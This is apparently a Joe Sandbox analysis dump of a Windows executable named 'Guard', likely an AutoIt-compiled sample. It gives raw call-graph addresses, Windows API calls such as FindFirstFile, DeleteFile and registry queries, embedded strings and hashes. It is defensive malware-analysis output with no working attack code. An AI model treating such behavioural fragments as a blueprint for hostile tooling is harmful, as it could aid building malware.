a4d891 GetStartupInfoW 99545->99546 99547 a4d831 __alloc_osfhnd @_EH4_CallFilterFunc@8 99545->99547 99548 a4d9d5 99546->99548 99553 a4d8a6 99546->99553 99547->99492 99549 a4da9d 99548->99549 99554 a4da22 GetStdHandle 99548->99554 99555 a4da35 GetFileType 99548->99555 99634 a4a05b InitializeCriticalSectionAndSpinCount 99548->99634 99635 a4daad LeaveCriticalSection _doexit 99549->99635 99550 a4d8f4 99550->99548 99556 a4d928 GetFileType 99550->99556 99633 a4a05b InitializeCriticalSectionAndSpinCount 99550->99633 99552 a48a05 __calloc_crt 58 API calls 99552->99553 99553->99548 99553->99550 99553->99552 99554->99548 99555->99548 99556->99550 99560 a55164 99559->99560 99561 a47f33 99559->99561 99636 a48a4d 58 API calls 2 library calls 99560->99636 99565 a54d4b GetModuleFileNameW 99561->99565 99563 a5518a _memmove 99564 a551a0 FreeEnvironmentStringsW 99563->99564 99564->99561 99566 a54d7f _wparse_cmdline 99565->99566 99568 a54dbf _wparse_cmdline 99566->99568 99637 a48a4d 58 API calls 2 library calls 99566->99637 99568->99499 99570 a54fa1 __NMSG_WRITE 99569->99570 99571 a54f99 99569->99571 99572 a48a05 __calloc_crt 58 API calls 99570->99572 99571->99503 99574 a54fca __NMSG_WRITE 99572->99574 99573 a55021 99575 a42f85 _free 58 API calls 99573->99575 99574->99571 99574->99573 99576 a48a05 __calloc_crt 58 API calls 99574->99576 99577 a55046 99574->99577 99580 a5505d 99574->99580 99638 a54837 58 API calls __cftof2_l 99574->99638 99575->99571 99576->99574 99578 a42f85 _free 58 API calls 99577->99578 99578->99571 99639 a48ff6 IsProcessorFeaturePresent 99580->99639 99582 a55069 99582->99503 99584 a4332b __IsNonwritableInCurrentImage 99583->99584 99662 a4a701 99584->99662 99586 a43349 __initterm_e 99587 a42f70 __cinit 67 API calls 99586->99587 99588 a43368 __cinit __IsNonwritableInCurrentImage 99586->99588 99587->99588 99588->99507 99590 a36044 99589->99590 99591 a35fa5 99589->99591 99590->99511 99592 a35fdf IsThemeActive 99591->99592 99665 a4359c 99592->99665 99596 a3600b 99677 
a35f00 SystemParametersInfoW SystemParametersInfoW 99596->99677 99598 a36017 99678 a35240 99598->99678 99600 a3601f SystemParametersInfoW 99600->99590 99601->99485 99602->99489 99603->99496 99607->99512 99608->99515 99609->99521 99610->99523 99611->99528 99612->99527 99616 a48a0c 99613->99616 99615 a48a47 99615->99532 99619 a4a016 TlsSetValue 99615->99619 99616->99615 99618 a48a2a 99616->99618 99622 a55426 99616->99622 99618->99615 99618->99616 99630 a4a362 Sleep 99618->99630 99619->99535 99620->99539 99621->99536 99623 a55431 99622->99623 99628 a5544c 99622->99628 99624 a5543d 99623->99624 99623->99628 99631 a48d58 58 API calls __getptd_noexit 99624->99631 99626 a5545c RtlAllocateHeap 99627 a55442 99626->99627 99626->99628 99627->99616 99628->99626 99628->99627 99632 a435d1 DecodePointer 99628->99632 99630->99618 99631->99627 99632->99628 99633->99550 99634->99548 99635->99547 99636->99563 99637->99568 99638->99574 99640 a49001 99639->99640 99645 a48e89 99640->99645 99644 a4901c 99644->99582 99646 a48ea3 _memset ___raise_securityfailure 99645->99646 99647 a48ec3 IsDebuggerPresent 99646->99647 99653 a4a385 SetUnhandledExceptionFilter UnhandledExceptionFilter 99647->99653 99650 a48f87 ___raise_securityfailure 99654 a4c826 99650->99654 99651 a48faa 99652 a4a370 GetCurrentProcess TerminateProcess 99651->99652 99652->99644 99653->99650 99655 a4c830 IsProcessorFeaturePresent 99654->99655 99656 a4c82e 99654->99656 99658 a55b3a 99655->99658 99656->99651 99661 a55ae9 5 API calls ___raise_securityfailure 99658->99661 99660 a55c1d 99660->99651 99661->99660 99663 a4a704 EncodePointer 99662->99663 99663->99663 99664 a4a71e 99663->99664 99664->99586 99666 a49e3b __lock 58 API calls 99665->99666 99667 a435a7 DecodePointer EncodePointer 99666->99667 99730 a49fa5 LeaveCriticalSection 99667->99730 99669 a36004 99670 a43604 99669->99670 99671 a4360e 99670->99671 99672 a43628 99670->99672 99671->99672 99731 a48d58 58 API calls __getptd_noexit 99671->99731 99672->99596 99674 a43618 
99732 a48fe6 9 API calls __cftof2_l 99674->99732 99676 a43623 99676->99596 99677->99598 99679 a3524d __write_nolock 99678->99679 99680 a31207 59 API calls 99679->99680 99681 a35258 GetCurrentDirectoryW 99680->99681 99733 a34ec8 99681->99733 99683 a3527e IsDebuggerPresent 99684 a70b21 MessageBoxA 99683->99684 99685 a3528c 99683->99685 99687 a70b39 99684->99687 99686 a352a0 99685->99686 99685->99687 99801 a331bf 99686->99801 99841 a3314d 59 API calls Mailbox 99687->99841 99690 a70b49 99698 a70b5f SetCurrentDirectoryW 99690->99698 99697 a3536c Mailbox 99697->99600 99698->99697 99730->99669 99731->99674 99732->99676 99734 a31207 59 API calls 99733->99734 99735 a34ede 99734->99735 99850 a35420 99735->99850 99737 a34efc 99738 a319e1 59 API calls 99737->99738 99739 a34f10 99738->99739 99740 a31c9c 59 API calls 99739->99740 99741 a34f1b 99740->99741 99864 a2477a 99741->99864 99744 a31a36 59 API calls 99745 a34f34 99744->99745 99746 a239be 68 API calls 99745->99746 99747 a34f44 Mailbox 99746->99747 99748 a31a36 59 API calls 99747->99748 99749 a34f68 99748->99749 99750 a239be 68 API calls 99749->99750 99751 a34f77 Mailbox 99750->99751 99752 a31207 59 API calls 99751->99752 99753 a34f94 99752->99753 99867 a355bc 99753->99867 99756 a4312d _W_store_winword 60 API calls 99757 a34fae 99756->99757 99758 a70a54 99757->99758 99759 a34fb8 99757->99759 99760 a355bc 59 API calls 99758->99760 99761 a4312d _W_store_winword 60 API calls 99759->99761 99762 a70a68 99760->99762 99763 a34fc3 99761->99763 99765 a355bc 59 API calls 99762->99765 99763->99762 99764 a34fcd 99763->99764 99766 a4312d _W_store_winword 60 API calls 99764->99766 99767 a70a84 99765->99767 99768 a34fd8 99766->99768 99770 a400cf 61 API calls 99767->99770 99768->99767 99769 a34fe2 99768->99769 99771 a4312d _W_store_winword 60 API calls 99769->99771 99772 a70aa7 99770->99772 99773 a34fed 99771->99773 99774 a355bc 59 API calls 99772->99774 99775 a34ff7 99773->99775 99776 a70ad0 99773->99776 99778 a70ab3 99774->99778 99779 
a3501b 99775->99779 99780 a31c9c 59 API calls 99775->99780 99777 a355bc 59 API calls 99776->99777 99781 a70aee 99777->99781 99782 a31c9c 59 API calls 99778->99782 99785 a247be 59 API calls 99779->99785 99784 a3500e 99780->99784 99786 a31c9c 59 API calls 99781->99786 99783 a70ac1 99782->99783 99787 a355bc 59 API calls 99783->99787 99788 a355bc 59 API calls 99784->99788 99789 a3502a 99785->99789 99790 a70afc 99786->99790 99787->99776 99788->99779 99791 a24540 59 API calls 99789->99791 99792 a355bc 59 API calls 99790->99792 99793 a35038 99791->99793 99794 a70b0b 99792->99794 99873 a243d0 99793->99873 99794->99794 99796 a2477a 59 API calls 99798 a35055 99796->99798 99797 a243d0 59 API calls 99797->99798 99798->99796 99798->99797 99799 a355bc 59 API calls 99798->99799 99800 a3509b Mailbox 99798->99800 99799->99798 99800->99683 99802 a331cc __write_nolock 99801->99802 99803 a70314 _memset 99802->99803 99804 a331e5 99802->99804 99807 a70330 GetOpenFileNameW 99803->99807 99805 a40284 60 API calls 99804->99805 99806 a331ee 99805->99806 99890 a409c5 99806->99890 99809 a7037f 99807->99809 99810 a31821 59 API calls 99809->99810 99812 a70394 99810->99812 99812->99812 99814 a33203 99908 a3278a 99814->99908 99841->99690 99851 a3542d __write_nolock 99850->99851 99852 a31821 59 API calls 99851->99852 99861 a35590 Mailbox 99851->99861 99854 a3545f 99852->99854 99853 a31609 59 API calls 99853->99854 99854->99853 99856 a35495 Mailbox 99854->99856 99855 a35563 99857 a31a36 59 API calls 99855->99857 99855->99861 99856->99855 99859 a31a36 59 API calls 99856->99859 99856->99861 99863 a31609 59 API calls 99856->99863 99882 a34c94 99856->99882 99858 a35584 99857->99858 99860 a34c94 59 API calls 99858->99860 99859->99856 99860->99861 99861->99737 99863->99856 99865 a40fe6 Mailbox 59 API calls 99864->99865 99866 a24787 99865->99866 99866->99744 99868 a355c6 99867->99868 99869 a355df 99867->99869 99870 a31c9c 59 API calls 99868->99870 99871 a31821 59 API calls 99869->99871 99872 a34fa0 
99870->99872 99871->99872 99872->99756 99874 a5d6c9 99873->99874 99876 a243e7 99873->99876 99874->99876 99889 a240cb 59 API calls Mailbox 99874->99889 99877 a244ef 99876->99877 99878 a24530 99876->99878 99879 a244e8 99876->99879 99877->99798 99888 a2523c 59 API calls 99878->99888 99881 a40fe6 Mailbox 59 API calls 99879->99881 99881->99877 99883 a34ca2 99882->99883 99887 a34cc4 _memmove 99882->99887 99886 a40fe6 Mailbox 59 API calls 99883->99886 99884 a40fe6 Mailbox 59 API calls 99885 a34cd8 99884->99885 99885->99856 99886->99887 99887->99884 99888->99877 99889->99876 99891 a51b70 __write_nolock 99890->99891 99892 a409d2 GetLongPathNameW 99891->99892 99893 a31821 59 API calls 99892->99893 99894 a331f7 99893->99894 99895 a32f3d 99894->99895 99896 a31207 59 API calls 99895->99896 99897 a32f4f 99896->99897 99898 a40284 60 API calls 99897->99898 99899 a32f5a 99898->99899 99900 a70177 99899->99900 99901 a32f65 99899->99901 99905 a70191 99900->99905 99948 a3151f 61 API calls 99900->99948 99903 a34c94 59 API calls 99901->99903 99904 a32f71 99903->99904 99942 a21307 99904->99942 99907 a32f84 Mailbox 99907->99814 99949 a349c2 99908->99949 99911 a6f8d6 100065 a89b16 122 API calls 2 library calls 99911->100065 99912 a349c2 136 API calls 99914 a327c3 99912->99914 99914->99911 99916 a327cb 99914->99916 99915 a6f8e7 99917 a6f8eb 99915->99917 99918 a6f908 99915->99918 99920 a327d7 99916->99920 99921 a6f8f3 99916->99921 100066 a34a2f 99917->100066 99919 a40fe6 Mailbox 59 API calls 99918->99919 99941 a6f94d Mailbox 99919->99941 99973 a329be 99920->99973 100072 a847e8 90 API calls _wprintf 99921->100072 99926 a6f901 99926->99918 99927 a6fb01 99935 a6fb12 99938 a31a36 59 API calls 99938->99941 99941->99927 99941->99935 99941->99938 100073 a7fef8 59 API calls 2 library calls 99941->100073 100074 a7fe19 61 API calls 2 library calls 99941->100074 100075 a8793a 59 API calls Mailbox 99941->100075 100076 a3343f 99941->100076 100084 a33297 99941->100084 99943 a21319 99942->99943 99947 a21338 
_memmove 99942->99947 99946 a40fe6 Mailbox 59 API calls 99943->99946 99944 a40fe6 Mailbox 59 API calls 99945 a2134f 99944->99945 99945->99907 99946->99947 99947->99944 99948->99900 100091 a34b29 99949->100091 99954 a708bb 99957 a34a2f 84 API calls 99954->99957 99955 a349ed LoadLibraryExW 100101 a34ade 99955->100101 99959 a708c2 99957->99959 99961 a34ade 3 API calls 99959->99961 99963 a708ca 99961->99963 99962 a34a14 99962->99963 99964 a34a20 99962->99964 100127 a34ab2 99963->100127 99965 a34a2f 84 API calls 99964->99965 99968 a327af 99965->99968 99968->99911 99968->99912 99970 a708f1 100133 a34a6e 99970->100133 99972 a708fe 99974 a6fd14 99973->99974 99975 a329e7 99973->99975 100065->99915 100067 a34a40 100066->100067 100068 a34a39 100066->100068 100070 a34a60 FreeLibrary 100067->100070 100071 a34a4f 100067->100071 100569 a455c6 100068->100569 100070->100071 100071->99921 100072->99926 100073->99941 100074->99941 100075->99941 100138 a34b77 100091->100138 100094 a34b60 FreeLibrary 100095 a349d4 100094->100095 100098 a4547b 100095->100098 100096 a34b77 2 API calls 100097 a34b50 100096->100097 100097->100094 100097->100095 100142 a45490 100098->100142 100100 a349e1 100100->99954 100100->99955 100223 a34baa 100101->100223 100104 a34baa 2 API calls 100107 a34b03 100104->100107 100105 a34b15 FreeLibrary 100106 a34a05 100105->100106 100108 a348b0 100106->100108 100107->100105 100107->100106 100109 a40fe6 Mailbox 59 API calls 100108->100109 100110 a348c5 100109->100110 100111 a3433f 59 API calls 100110->100111 100112 a348d1 _memmove 100111->100112 100113 a7080a 100112->100113 100114 a3490c 100112->100114 100116 a70817 100113->100116 100232 a89ed8 CreateStreamOnHGlobal FindResourceExW LoadResource SizeofResource LockResource 100113->100232 100115 a34a6e 69 API calls 100114->100115 100119 a34915 100115->100119 100233 a89f5e 95 API calls 100116->100233 100120 a34ab2 74 API calls 100119->100120 100121 a70859 100119->100121 100126 a349a0 100119->100126 100227 a34a8c 
100119->100227 100120->100119 100122 a34a8c 85 API calls 100121->100122 100123 a70890 100122->100123 100125 a34ab2 74 API calls 100123->100125 100125->100126 100126->99962 100128 a34ac4 100127->100128 100131 a70945 100127->100131 100339 a45802 100128->100339 100132 a896c4 GetSystemTimeAsFileTime 100132->99970 100134 a34a7d 100133->100134 100135 a70908 100133->100135 100464 a45e80 100134->100464 100137 a34a85 100137->99972 100139 a34b44 100138->100139 100140 a34b80 LoadLibraryA 100138->100140 100139->100096 100139->100097 100140->100139 100141 a34b91 GetProcAddress 100140->100141 100141->100139 100143 a4549c __alloc_osfhnd 100142->100143 100144 a454af 100143->100144 100147 a454e0 100143->100147 100191 a48d58 58 API calls __getptd_noexit 100144->100191 100146 a454b4 100192 a48fe6 9 API calls __cftof2_l 100146->100192 100161 a50718 100147->100161 100150 a454e5 100151 a454ee 100150->100151 100152 a454fb 100150->100152 100193 a48d58 58 API calls __getptd_noexit 100151->100193 100154 a45525 100152->100154 100155 a45505 100152->100155 100176 a50837 100154->100176 100194 a48d58 58 API calls __getptd_noexit 100155->100194 100156 a454bf __alloc_osfhnd @_EH4_CallFilterFunc@8 100156->100100 100162 a50724 __alloc_osfhnd 100161->100162 100163 a49e3b __lock 58 API calls 100162->100163 100174 a50732 100163->100174 100164 a507a6 100196 a5082e 100164->100196 100165 a507ad 100201 a48a4d 58 API calls 2 library calls 100165->100201 100168 a507b4 100168->100164 100202 a4a05b InitializeCriticalSectionAndSpinCount 100168->100202 100169 a50823 __alloc_osfhnd 100169->100150 100171 a49ec3 __mtinitlocknum 58 API calls 100171->100174 100173 a507da EnterCriticalSection 100173->100164 100174->100164 100174->100165 100174->100171 100199 a46e7d 59 API calls __lock 100174->100199 100200 a46ee7 LeaveCriticalSection LeaveCriticalSection _doexit 100174->100200 100185 a50857 __wopenfile 100176->100185 100177 a50871 100207 a48d58 58 API calls __getptd_noexit 100177->100207 100179 a50a2c 100179->100177 
100183 a50a8f 100179->100183 100180 a50876 100208 a48fe6 9 API calls __cftof2_l 100180->100208 100182 a45530 100195 a45552 LeaveCriticalSection LeaveCriticalSection __wfsopen 100182->100195 100204 a587d1 100183->100204 100185->100177 100185->100179 100185->100185 100209 a439fb 60 API calls 2 library calls 100185->100209 100187 a50a25 100187->100179 100210 a439fb 60 API calls 2 library calls 100187->100210 100189 a50a44 100189->100179 100211 a439fb 60 API calls 2 library calls 100189->100211 100191->100146 100192->100156 100193->100156 100194->100156 100195->100156 100203 a49fa5 LeaveCriticalSection 100196->100203 100198 a50835 100198->100169 100199->100174 100200->100174 100201->100168 100202->100173 100203->100198 100212 a57fb5 100204->100212 100206 a587ea 100206->100182 100207->100180 100208->100182 100209->100187 100210->100189 100211->100179 100213 a57fc1 __alloc_osfhnd 100212->100213 100214 a57fd7 100213->100214 100217 a5800d 100213->100217 100215 a48d58 __cftof2_l 58 API calls 100214->100215 100216 a57fdc 100215->100216 100218 a48fe6 __cftof2_l 9 API calls 100216->100218 100219 a5807e __wsopen_nolock 109 API calls 100217->100219 100222 a57fe6 __alloc_osfhnd 100218->100222 100220 a58029 100219->100220 100221 a58052 __wsopen_helper LeaveCriticalSection 100220->100221 100221->100222 100222->100206 100224 a34af7 100223->100224 100225 a34bb3 LoadLibraryA 100223->100225 100224->100104 100224->100107 100225->100224 100226 a34bc4 GetProcAddress 100225->100226 100226->100224 100228 a70923 100227->100228 100229 a34a9b 100227->100229 100234 a45a6d 100229->100234 100231 a34aa9 100231->100119 100232->100116 100233->100119 100237 a45a79 __alloc_osfhnd 100234->100237 100235 a45a8b 100265 a48d58 58 API calls __getptd_noexit 100235->100265 100237->100235 100238 a45ab1 100237->100238 100247 a46e3e 100238->100247 100240 a45a90 100266 a48fe6 9 API calls __cftof2_l 100240->100266 100246 a45a9b __alloc_osfhnd 100246->100231 100248 a46e70 EnterCriticalSection 100247->100248 100249 
a46e4e 100247->100249 100252 a45ab7 100248->100252 100249->100248 100250 a46e56 100249->100250 100251 a49e3b __lock 58 API calls 100250->100251 100251->100252 100253 a459de 100252->100253 100254 a459fc 100253->100254 100255 a459ec 100253->100255 100257 a45a12 100254->100257 100268 a45af0 100254->100268 100338 a48d58 58 API calls __getptd_noexit 100255->100338 100297 a44c5d 100257->100297 100265->100240 100266->100246 100342 a4581d 100339->100342 100341 a34ad5 100341->100132 100343 a45829 __alloc_osfhnd 100342->100343 100344 a4586c 100343->100344 100345 a4583f _memset 100343->100345 100346 a45864 __alloc_osfhnd 100343->100346 100347 a46e3e __lock_file 59 API calls 100344->100347 100369 a48d58 58 API calls __getptd_noexit 100345->100369 100346->100341 100348 a45872 100347->100348 100355 a4563d 100348->100355 100351 a45859 100370 a48fe6 9 API calls __cftof2_l 100351->100370 100356 a45673 100355->100356 100358 a45658 _memset 100355->100358 100371 a458a6 LeaveCriticalSection LeaveCriticalSection __wfsopen 100356->100371 100357 a45663 100460 a48d58 58 API calls __getptd_noexit 100357->100460 100358->100356 100358->100357 100364 a456b3 100358->100364 100360 a45668 100461 a48fe6 9 API calls __cftof2_l 100360->100461 100363 a457c4 _memset 100463 a48d58 58 API calls __getptd_noexit 100363->100463 100364->100356 100364->100363 100366 a44906 __flswbuf 58 API calls 100364->100366 100372 a5108b 100364->100372 100440 a50dd7 100364->100440 100462 a50ef8 58 API calls 3 library calls 100364->100462 100366->100364 100369->100351 100370->100346 100371->100346 100373 a510c3 100372->100373 100374 a510ac 100372->100374 100376 a517fb 100373->100376 100380 a510fd 100373->100380 100375 a48d24 __free_osfhnd 58 API calls 100374->100375 100377 a510b1 100375->100377 100378 a48d24 __free_osfhnd 58 API calls 100376->100378 100379 a48d58 __cftof2_l 58 API calls 100377->100379 100381 a51800 100378->100381 100420 a510b8 100379->100420 100383 a51105 100380->100383 100389 a5111c 100380->100389 100382 

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                            • Part of subcall function 00A40284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A32A58,?,00008000), ref: 00A402A4
                                                                                            • Part of subcall function 00A84FEC: GetFileAttributesW.KERNEL32(?,00A83BFE), ref: 00A84FED
                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00A8407C
                                                                                          • DeleteFileW.KERNEL32(?,?,?,?), ref: 00A840CC
                                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00A840DD
                                                                                          • FindClose.KERNEL32(00000000), ref: 00A840F4
                                                                                          • FindClose.KERNEL32(00000000), ref: 00A840FD
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.2642900807.0000000000A21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A20000, based on PE: true
                                                                                          • Associated: 00000015.00000002.2642858160.0000000000A20000.00000002.00000001.01000000.0000000F.sdmp
                                                                                          • Associated: 00000015.00000002.2643030340.0000000000AB0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                          • Associated: 00000015.00000002.2643030340.0000000000AD6000.00000002.00000001.01000000.0000000F.sdmp
                                                                                          • Associated: 00000015.00000002.2643136989.0000000000AE0000.00000004.00000001.01000000.0000000F.sdmp
                                                                                          • Associated: 00000015.00000002.2643185965.0000000000AE9000.00000002.00000001.01000000.0000000F.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_a20000_Guard.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                          • String ID: \*.*
                                                                                          • API String ID: 2649000838-1173974218
                                                                                          • Opcode ID: d636307e8e3330565cb7fb84532eb27cbf5191d6baec9a4bd1d647f7d8fa245c
                                                                                          • Instruction ID: 33d1e1fe7f133cc3d1270c06769414e88d19814c890037f220640aed064ee209
                                                                                          • Opcode Fuzzy Hash: d636307e8e3330565cb7fb84532eb27cbf5191d6baec9a4bd1d647f7d8fa245c
                                                                                          • Instruction Fuzzy Hash: 2B316E310083859BC705FBA4C995DEFB7A8BE95304F444A2DF5E582192EB24DA09DB63
                                                                                          APIs
                                                                                          • GetFileAttributesW.KERNEL32(?,00A6FC86), ref: 00A8495A
                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00A8496B
                                                                                          • FindClose.KERNEL32(00000000), ref: 00A8497B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.2642900807.0000000000A21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A20000, based on PE: true
                                                                                          • Associated: 00000015.00000002.2642858160.0000000000A20000.00000002.00000001.01000000.0000000F.sdmp
                                                                                          • Associated: 00000015.00000002.2643030340.0000000000AB0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                          • Associated: 00000015.00000002.2643030340.0000000000AD6000.00000002.00000001.01000000.0000000F.sdmp
                                                                                          • Associated: 00000015.00000002.2643136989.0000000000AE0000.00000004.00000001.01000000.0000000F.sdmp
                                                                                          • Associated: 00000015.00000002.2643185965.0000000000AE9000.00000002.00000001.01000000.0000000F.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_a20000_Guard.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileFind$AttributesCloseFirst
                                                                                          • String ID:
                                                                                          • API String ID: 48322524-0
                                                                                          • Opcode ID: 69f1506d2ffc60010f7ec4296346e985158610a8239a868a7f7cbec8eddeee7b
                                                                                          • Instruction ID: c4092c1a08cce1f33020f1a4a3b257b7a00562d4407cbafdc4d7451a73023f38
                                                                                          • Opcode Fuzzy Hash: 69f1506d2ffc60010f7ec4296346e985158610a8239a868a7f7cbec8eddeee7b
                                                                                          • Instruction Fuzzy Hash: 8DE0DF31810606AB8224BB7CEC0D8EBB75C9E0A339F100715F935C20E0FB7099548796

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                            • Part of subcall function 00A40B8B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00A32A3E,?,00008000), ref: 00A40BA7
                                                                                            • Part of subcall function 00A40284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A32A58,?,00008000), ref: 00A402A4
                                                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00A32ADF
                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00A32C2C
                                                                                            • Part of subcall function 00A33EBE: _wcscpy.LIBCMT ref: 00A33EF6
                                                                                            • Part of subcall function 00A4386D: _iswctype.LIBCMT ref: 00A43875
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.2642900807.0000000000A21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A20000, based on PE: true
                                                                                          • Associated: 00000015.00000002.2642858160.0000000000A20000.00000002.00000001.01000000.0000000F.sdmp
                                                                                          • Associated: 00000015.00000002.2643030340.0000000000AB0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                          • Associated: 00000015.00000002.2643030340.0000000000AD6000.00000002.00000001.01000000.0000000F.sdmp
                                                                                          • Associated: 00000015.00000002.2643136989.0000000000AE0000.00000004.00000001.01000000.0000000F.sdmp
                                                                                          • Associated: 00000015.00000002.2643185965.0000000000AE9000.00000002.00000001.01000000.0000000F.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_a20000_Guard.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                                          • String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                          • API String ID: 537147316-3738523708
                                                                                          • Opcode ID: ddc21af296d14e4c408d5bebcb5cc8f7f0176eb5466a65294b705c17e221e1e6
                                                                                          • Instruction ID: 16f5d4861977084ad9af50914e3f2509f827ac64deced84202aeb23dcf2a4909
                                                                                          • Opcode Fuzzy Hash: ddc21af296d14e4c408d5bebcb5cc8f7f0176eb5466a65294b705c17e221e1e6
                                                                                          • Instruction Fuzzy Hash: 43029F711083419FC724EF24C981AAFBBF5EF99354F10492DF499972A2DB30DA49CB52

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                            • Part of subcall function 00A400CF: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00A33094), ref: 00A400ED
                                                                                            • Part of subcall function 00A408C1: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00A3309F), ref: 00A408E3
                                                                                          • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00A330E2
                                                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00A701BA
                                                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00A701FB
                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00A70239
                                                                                          • _wcscat.LIBCMT ref: 00A70292
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.2642900807.0000000000A21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A20000, based on PE: true
                                                                                          • Associated: 00000015.00000002.2642858160.0000000000A20000.00000002.00000001.01000000.0000000F.sdmp
                                                                                          • Associated: 00000015.00000002.2643030340.0000000000AB0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                          • Associated: 00000015.00000002.2643030340.0000000000AD6000.00000002.00000001.01000000.0000000F.sdmp
                                                                                          • Associated: 00000015.00000002.2643136989.0000000000AE0000.00000004.00000001.01000000.0000000F.sdmp
                                                                                          • Associated: 00000015.00000002.2643185965.0000000000AE9000.00000002.00000001.01000000.0000000F.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_a20000_Guard.jbxd
                                                                                          Similarity
                                                                                          • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                                          • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                          • API String ID: 2673923337-2727554177
                                                                                          • Opcode ID: ecc21fb24f9637e0db3c03907b336ae05d008c70fb89ab110ddbf0d99372ca74
                                                                                          • Instruction ID: 0151ee9ffa113f3db4c992067843e859106ad59c3eb288dad1dad2b7baf6014d
                                                                                          • Opcode Fuzzy Hash: ecc21fb24f9637e0db3c03907b336ae05d008c70fb89ab110ddbf0d99372ca74
                                                                                          • Instruction Fuzzy Hash: B1718E724093419EC704EFA5DD819ABBBE8FF84340F40492EF6599B1A1EF349949CB52

                                                                                          Control-flow Graph

                                                                                          control_flow_graph 974 a34d83-a34dd1 976 a34dd3-a34dd6 974->976 977 a34e31-a34e33 974->977 979 a34e37 976->979 980 a34dd8-a34ddf 976->980 977->976 978 a34e35 977->978 983 a34e1a-a34e22 DefWindowProcW 978->983 984 a709c2-a709f0 call a2c460 call a2c483 979->984 985 a34e3d-a34e40 979->985 981 a34de5-a34dea 980->981 982 a34ead-a34eb5 PostQuitMessage 980->982 986 a70a35-a70a49 call a82cce 981->986 987 a34df0-a34df2 981->987 990 a34e61-a34e63 982->990 989 a34e28-a34e2e 983->989 1019 a709f5-a709fc 984->1019 991 a34e42-a34e43 985->991 992 a34e65-a34e8c SetTimer RegisterWindowMessageW 985->992 986->990 1010 a70a4f 986->1010 993 a34eb7-a34ec1 call a35b29 987->993 994 a34df8-a34dfd 987->994 990->989 998 a70965-a70968 991->998 999 a34e49-a34e5c KillTimer call a35ac3 call a234e4 991->999 992->990 995 a34e8e-a34e99 CreatePopupMenu 992->995 1012 a34ec6 993->1012 1000 a34e03-a34e08 994->1000 1001 a70a1a-a70a21 994->1001 995->990 1005 a7099e-a709bd MoveWindow 998->1005 1006 a7096a-a7096c 998->1006 999->990 1008 a34e9b-a34eab call a35bd7 1000->1008 1009 a34e0e-a34e14 1000->1009 1001->983 1016 a70a27-a70a30 call a78854 1001->1016 1005->990 1013 a7096e-a70971 1006->1013 1014 a7098d-a70999 SetFocus 1006->1014 1008->990 1009->983 1009->1019 1010->983 1012->990 1013->1009 1020 a70977-a70988 call a2c460 1013->1020 1014->990 1016->983 1019->983 1024 a70a02-a70a15 call a35ac3 call a359d3 1019->1024 1020->990 1024->983
                                                                                          APIs
                                                                                          • DefWindowProcW.USER32(?,?,?,?), ref: 00A34E22
                                                                                          • KillTimer.USER32(?,00000001), ref: 00A34E4C
                                                                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00A34E6F
                                                                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00A34E7A
                                                                                          • CreatePopupMenu.USER32 ref: 00A34E8E
                                                                                          • PostQuitMessage.USER32(00000000), ref: 00A34EAF
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.2642900807.0000000000A21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A20000, based on PE: true
                                                                                          • Associated: 00000015.00000002.2642858160.0000000000A20000.00000002.00000001.01000000.0000000F.sdmp
                                                                                          • Associated: 00000015.00000002.2643030340.0000000000AB0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                          • Associated: 00000015.00000002.2643030340.0000000000AD6000.00000002.00000001.01000000.0000000F.sdmp
                                                                                          • Associated: 00000015.00000002.2643136989.0000000000AE0000.00000004.00000001.01000000.0000000F.sdmp
                                                                                          • Associated: 00000015.00000002.2643185965.0000000000AE9000.00000002.00000001.01000000.0000000F.sdmp
